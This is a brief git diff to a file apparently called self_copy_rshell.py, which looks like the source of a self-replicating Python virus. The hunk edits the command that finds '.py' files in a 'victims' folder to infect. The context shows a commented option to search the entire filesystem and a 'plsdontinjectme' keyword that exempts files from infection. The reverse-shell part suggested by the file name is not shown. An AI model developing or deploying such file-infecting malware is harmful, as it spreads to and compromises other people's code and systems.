diff --git a/self_copy_rshell.py b/self_copy_rshell.py index ea27c04..defae51 100644 --- a/self_copy_rshell.py +++ b/self_copy_rshell.py @@ -6,7 +6,7 @@ import string #!x # search command, adjust to your needs #cmd = 'find / -name "*.py" -print' #!x -cmd = 'find ./victims -name "*.py" -print' #!x +cmd = 'find ./victims -name "*.py" -print 2>/dev/null' #!x # keyword which prevents file from getting infected keyword = 'plsdontinjectme' #!x